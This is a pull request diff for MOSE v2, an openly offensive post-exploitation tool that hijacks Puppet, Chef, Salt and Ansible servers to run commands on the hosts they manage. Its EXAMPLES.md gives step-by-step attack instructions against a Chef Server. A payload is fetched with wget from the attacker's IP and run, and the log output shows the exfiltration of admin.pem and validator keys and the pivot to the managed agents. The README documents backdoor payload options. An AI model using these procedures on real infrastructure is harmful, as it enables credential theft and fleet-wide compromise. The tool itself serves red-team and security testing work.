Merge pull request #49 from master-of-servers/bsides

This pull request has the code for MOSE v2. This includes support for Salt and a complete rewrite of the UI.

.gitignore

@@ -18,6 +18,9 @@ chef-linux
 puppet-linux
 ansible-linux
 
+# Output from pkger
+pkged.go
+
 # Application-generated folders
 payloads/
 keys/

EXAMPLES.md

@@ -3,11 +3,11 @@ This will allow you specify a command that will be run on all target agents.
 
 1. Run MOSE with the following options:
 ```
-./mose -c <command> -t <target CM>
+./mose <target CM> -c <command>
 ```
 For example:
 ```
-./mose -c "echo HELLO >> /tmp/friendlyFile.txt" -t chef
+./mose chef -c "echo HELLO >> /tmp/friendlyFile.txt"
 ```
 
 2. On the target, download the payload that is being served (assuming you opted to have MOSE serve it for you) and give it execute permissions.
@@ -28,11 +28,11 @@ This will allow you to specify a script or a binary that will be run on all targ
 
 1. Run MOSE with the following options: 
 ```
-./mose -fu <name of file> -t <target CM>
+./mose puppet -u <name of file>
 ```
 For example:
 ```
-./mose -fu /tmp/notevil.sh -t puppet
+./mose puppet -u /tmp/notevil.sh
 ```
 
 2. On the target, download the payload that is being served (assuming you opted to have MOSE serve it for you) and give it execute permissions.
@@ -55,3 +55,62 @@ If you want to clean up after you're done, run the payload again with the `-c` o
 ```
 ./puppet-linux -c
 ```
+
+## Instructions to run against a Chef Server
+If you land on a Chef Server (as opposed to a Chef Workstation), this will allow you to steal the files that you'll need to generate a workstation of your own and use it to attack the assets managed by the target Chef Server.
+
+1. Run MOSE with the following options: 
+```
+./mose chef -c <command> -l <your ip address> -r <chef server hostname>:<chef server IP>
+```
+For example (using the [vagrant test environment](https://github.com/master-of-servers/chef-test-lab/tree/master/vagrant)):
+```
+./mose chef -c "touch /tmp/helloserver.txt && echo Hello, I am a file created by MOSE for Chef Server. >> /tmp/helloserver.txt" -l 192.168.58.29 -r chef-server:10.42.42.10
+```
+
+2. On the Chef Server, download the payload that is being served (assuming you opted to have MOSE serve it for you) and give it execute permissions.
+For example (using the [vagrant test environment](https://github.com/master-of-servers/chef-test-lab/tree/master/vagrant)):
+```
+wget http://192.168.58.29:8090/chef-linux
+```
+
+3. Make it executable:
+```
+chmod +x chef-linux
+```
+
+4. Run the payload:
+```
+./chef-linux
+```
+
+5. Back on your machine, answer the prompts:
+```
+2020-09-26T18:30:59Z MSG : Is your target a chef workstation? [Y/n/q]
+n
+2020-09-26T18:31:09Z MSG : Is your target a chef server? [Y/n/q]
+Y
+2020-09-26T18:31:10Z MSG : Listener being served at http://192.168.58.29:9090/chef-linux for 60 seconds
+```
+6. Wait for the files that you need to take to be exfilled. 
+For example:
+```
+2020-09-26T18:31:13Z INF : Successfully uploaded my_org
+
+2020-09-26T18:31:13Z INF : Successfully exfilled admin.pem
+2020-09-26T18:31:13Z INF : Successfully exfilled my_org-validator.pem
+
+2020-09-26T18:32:10Z INF : Web server shutting down...
+```
+7. Eventually you will be dropped into the workstation, and you proceed with your attack from there as you would normally.
+For example:
+```
+2020-09-26T18:34:41Z INF : Running knife ssl fetch, please wait...
+2020-09-26T18:34:47Z MSG : The following nodes were identified: chef-agent-1 chef-agent-2 chef-agent-3
+2020-09-26T18:34:47Z MSG : Do you want to target specific chef agents? [Y/n/q]
+```
+
+**Note:** You will get an error about the stealing of secrets - reason being that you don't have any on this workstation (you just stood it up yourself):
+```
+2020-09-26T19:06:38Z ERR : Error while getting the vault list error="/opt/chefdk/bin/knife [vault list] ERROR: Chef::Exceptions::InvalidDataBagPath: Data bag path '/root/.chef/data_bags' is invalid\n exit status 100"
+```

Makefile

@@ -1,42 +1,24 @@
 build:
-	go get -u github.com/gobuffalo/packr/v2/packr2
 	export GO111MODULE=on
-	packr2 build
-	go get
+	go get github.com/markbates/pkger/cmd/pkger
+	go get -u -v
 	go build
 	mkdir -p payloads
 
-clean:
-	packr2 clean
-
-setup-linter: ## Install all the build and lint dependencies
-	gometalinter --install
-
-fmt: ## gofmt and goimports all go files
+fmt: 
 	find . -name '*.go' -not -wholename './vendor/*' | while read -r file; do gofmt -w -s "$$file"; goimports -w "$$file"; done
 
-lint: ## Run all the linters
-	golangci-lint run \
-		--no-config \
-		--issues-exit-code=0 \
-		--timeout=30m \
-		--disable-all \
-		--enable=deadcode \
-		--enable=gocyclo \
-		--enable=golint \
-		--enable=varcheck \
-		--enable=structcheck \
-		--enable=maligned \
-		--enable=errcheck \
-		--enable=dupl \
-		--enable=ineffassign \
-		--enable=interfacer \
-		--enable=unconvert \
-		--enable=goconst \
-		--enable=gosec \
-		--enable=megacheck 
-	markdownfmt -w README.md
+lint:
+	gometalinter --exclude=vendor --exclude=repos --disable-all --enable=golint --enable=vet --enable=gofmt ./...
+	find . -name '*.go' | xargs gofmt -w -s
 
 test:
 	go test -count=1 -v -race ./... ; \
 		echo "Testing Complete."
+
+tidy:
+	go mod tidy
+	pushd cmd/puppet/main/; go mod tidy; popd
+	pushd cmd/chef/main/; go mod tidy; popd
+	pushd cmd/ansible/main/; go mod tidy; popd
+	pushd cmd/salt/main/; go mod tidy; popd

README.md

@@ -8,7 +8,7 @@
 Under the terms of Contract DE-NA0003525 with NTESS, 
 the U.S. Government retains certain rights in this software
 
-MOSE is a post exploitation tool that enables security professionals with little or no experience with configuration management (CM) technologies to leverage them to compromise environments. CM tools, such as [Puppet](https://puppet.com/), [Chef](https://www.chef.io/) and [Ansible](https://www.ansible.com/), are used to provision systems in a uniform manner based on their function in a network. Upon successfully compromising a CM server, an attacker can use these tools to run commands on any and all systems that are in the CM server’s inventory. However, if the attacker does not have experience with these types of tools, there can be a very time-consuming learning curve. MOSE allows an operator to specify what they want to run without having to get bogged down in the details of how to write code specific to a proprietary CM tool. It also automatically incorporates the desired commands into existing code on the system, removing that burden from the user. MOSE allows the operator to choose which assets they want to target within the scope of the server’s inventory, whether this is a subset of clients or all clients. This is useful for targeting specific assets such as web servers or choosing to take over all of the systems in the CM server’s inventory.
+MOSE is a post exploitation tool that enables security professionals with little or no experience with configuration management (CM) technologies to leverage them to compromise environments. CM tools, such as [Puppet](https://puppet.com/), [Chef](https://www.chef.io/), [Salt](https://www.saltstack.com/), and [Ansible](https://www.ansible.com/) are used to provision systems in a uniform manner based on their function in a network. Upon successfully compromising a CM server, an attacker can use these tools to run commands on any and all systems that are in the CM server’s inventory. However, if the attacker does not have experience with these types of tools, there can be a very time-consuming learning curve. MOSE allows an operator to specify what they want to run without having to get bogged down in the details of how to write code specific to a proprietary CM tool. It also automatically incorporates the desired commands into existing code on the system, removing that burden from the user. MOSE allows the operator to choose which assets they want to target within the scope of the server’s inventory, whether this is a subset of clients or all clients. This is useful for targeting specific assets such as web servers or choosing to take over all of the systems in the CM server’s inventory.
 
 ## MOSE + Puppet
 ![](docs/images/mose_and_puppet.gif)
@@ -19,52 +19,57 @@ MOSE is a post exploitation tool that enables security professionals with little
 ## Dependencies
 You must download and install the following for MOSE to work:
 
- - [Golang](https://golang.org/) - tested with 1.12.7 through 1.13.4
+ - [Golang](https://golang.org/) - tested with 1.12.7 through 1.15.2
 
  **Be sure to properly set your GOROOT, PATH and GOPATH env vars**
 
- - [Docker](https://docs.docker.com/install/) - tested with 18.09.2 through 19.03.4
+ - [Docker](https://docs.docker.com/install/) - tested with 18.09.2 through 19.03.12
 
 ## Getting started
-Install all go-specific dependencies and build the binary:
+Grab the code without having to clone the repo:
+```
+go get -u -v github.com/master-of-servers/mose
+```
+
+Install all go-specific dependencies and build the binary (be sure to `cd` into the repo before running this):
 ```
 make build
 ```
 ### Usage
 ```
-Usage of ./mose [options]:
-  -a string
-        Architecture that the target CM tool is running on (default "amd64")
-  -c string
-        Command to run on the targets
-  -d    Display debug output
-  -ep int
-        Port used to exfil data from chef server (default 443 with ssl, 9090 without) (default 443)
-  -f string
-        Output binary locally at <filepath>
-  -fu string
-        File upload option
-  -l string
-        Local IP Address
-  -m string
-        Name for backdoor payload (default "my_cmd")
-  -o string
-        Operating system that the target CM tool is on (default "linux")
-  -p int
-        Port used to serve payloads on (default 443 with ssl, 8090 without) (default 443)
-  -r string
-        Set the remote host for /etc/hosts in the chef workstation container (format is hostname:ip)
-  -rfp string
-        Remote file path to upload a script to (used in conjunction with -fu) (default "/root/.definitelynotevil")
-  -s string
-        JSON file to load for MOSE (default "settings.json")
-  -ssl
-        Serve payload over TLS
-  -t string
-        Configuration management tool to target (default "puppet")
-  -tts int
-        Number of seconds to serve the payload (default 60)
-  ```
+Usage:
+  github.com/master-of-servers/mose [command]
+
+Available Commands:
+  ansible     Create MOSE payload for ansible
+  chef        Create MOSE payload for chef
+  help        Help about any command
+  puppet      Create MOSE payload for puppet
+  salt        Create MOSE payload for salt
+
+Flags:
+      --basedir string            Location of payloads output by mose (default "/Users/l/programs/go/src/github.com/master-of-servers/mose")
+  -c, --cmd string                Command to run on the targets
+      --config string             config file (default is $PWD/.settings.yaml)
+      --debug                     Display debug output
+      --exfilport int             Port used to exfil data from chef server (default 9090, 443 with SSL) (default 9090)
+  -f, --filepath string           Output binary locally at <filepath>
+  -u, --fileupload string         File upload option
+  -h, --help                      help for github.com/master-of-servers/mose
+  -l, --localip string            Local IP Address
+      --nocolor                   Disable colors for mose
+  -a, --osarch string             Architecture that the target CM tool is running on
+  -o, --ostarget string           Operating system that the target CM server is on (default "linux")
+  -m, --payloadname string        Name for backdoor payload (default "my_cmd")
+      --payloads string           Location of payloads output by mose (default "/Users/l/programs/go/src/github.com/master-of-servers/mose/payloads")
+      --remoteuploadpath string   Remote file path to upload a script to (used in conjunction with -fu) (default "/root/.definitelynotevil")
+  -r, --rhost string              Set the remote host for /etc/hosts in the chef workstation container (format is hostname:ip)
+      --ssl                       Serve payload over TLS
+      --tts int                   Number of seconds to serve the payload (default 60)
+      --websrvport int            Port used to serve payloads (default 8090, 443 with SSL) (default 8090)
+
+Use "github.com/master-of-servers/mose [command] --help" for more information about a command.
+```
 
 ### TLS Certificates
 **You should generate and use a TLS certificate signed by a trusted Certificate Authority**